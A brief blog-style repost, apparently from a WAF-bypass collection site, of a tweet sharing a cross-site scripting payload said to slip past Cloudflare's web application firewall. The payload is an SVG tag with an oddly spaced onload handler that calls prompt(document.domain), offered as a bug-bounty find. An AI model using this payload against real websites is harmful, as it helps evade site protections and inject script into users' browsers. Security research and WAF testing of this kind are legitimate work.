CloudFlare bypass XSS by 0x7yr

Date: December 30, 2022Author: wafbypass

Not sure if this is a new Cloudflare WAF bypass, but all known CF bypasses I tried were blocked. So I played around with the spaces and the on events and finally found one that works:

“><svg on onload =%20 prompt(document.domain) >

#CloudflareXSSBypass #bugbounty https://t.co/EzwzSUdS3T

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

CloudFlare bypass XSS by 0x7yr